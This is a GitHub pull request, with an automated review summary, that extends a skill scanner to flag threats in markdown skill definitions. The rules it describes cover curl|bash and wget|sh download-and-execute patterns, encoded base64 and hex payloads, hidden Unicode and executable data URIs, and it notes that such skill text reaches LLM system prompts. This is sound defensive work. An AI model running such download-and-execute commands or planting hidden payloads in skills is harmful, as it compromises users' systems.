#10705: security: extend skill scanner to detect threats in markdown skill definitions

by Alex-Alaniz open 2026-02-06 21:37 View on GitHub →

stale

Cluster: Security Enhancements for Zip Handling

## Summary Extends the skill scanner to detect security threats in markdown files (`.md`), closing a gap where malicious content in `SKILL.md` skill definitions could bypass code-only scanning. **Motivation:** The ClawHavoc advisory revealed 341+ malicious ClawHub skills. While VirusTotal scans code files for known malware signatures, skill metadata lives in markdown (`SKILL.md`) — which was previously unscanned. Attackers can embed download-and-execute patterns, obfuscated payloads, hidden Unicode (Trojan Source / CVE-2021-42574), and executable data URIs in skill documentation that gets injected into LLM system prompts. **Changes:** - Split `SCANNABLE_EXTENSIONS` into `CODE_EXTENSIONS` and `MARKDOWN_EXTENSIONS` to enable file-type-specific rule routing - Added `isMarkdown()` helper and route `scanSource()` to use markdown-specific rules for `.md` files - **New markdown line rules:** `hidden-unicode` (zero-width + bidi override characters), `markdown-data-uri` (executable MIME types) - **New markdown source rules:** `markdown-download-exec` (`curl|bash` patterns), `markdown-encoded-payload` (large base64 in code blocks), `markdown-hex-payload` (hex-encoded sequences) - Existing code rules (`eval`, `child_process`, etc.) are isolated from markdown files to prevent false positives on documentation examples **Rule isolation:** Code-specific rules only fire on code files; markdown-specific rules only fire on `.md` files. This prevents breaking existing scanner behavior while extending coverage. ## Test plan - [x] All 39 tests pass (13 original + 26 new) - [x] New tests cover: zero-width Unicode, RTL overrides, data URIs, curl|bash, wget|sh, large base64 blocks, hex payloads - [x] Rule isolation verified: code rules don't fire on `.md`, markdown rules don't fire on `.ts` - [x] Clean `SKILL.md` produces zero findings - [x] Directory scanning and summary counting work with mixed file types - [x] `oxlint` passes with 0 warnings/errors - [x] `tsgo` type checking passes ```bash pnpm vitest run src/security/skill-scanner.test.ts ``` 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>  <h2>Greptile Overview</h2> <h3>Greptile Summary</h3> - Extends the skill scanner to treat `.md` as scannable and routes markdown files through a new set of markdown-specific rules. - Adds markdown line rules to detect hidden Unicode/BiDi characters and executable `data:` URIs. - Adds markdown source rules to flag download-and-execute patterns, large base64 blocks in fenced code, and hex-encoded payload strings. - Updates tests to cover new markdown findings, directory scanning of `SKILL.md`, summary counting, and rule isolation between code vs markdown. <h3>Confidence Score: 3/5</h3> - This PR is likely safe to merge, but a couple of detection rules are brittle and can cause missed detections or noisy false positives. - Core change (routing `.md` to markdown-specific rules and expanding scannable extensions) is straightforward and well-tested. Main concerns are (1) regex statefulness in `scanSource` if any rule regex acquires `g/y` flags, and (2) markdown base64 and download/exec heuristics being either overly broad (false positives) or too narrow (missed common patterns), which undermines scanner correctness. - src/security/skill-scanner.ts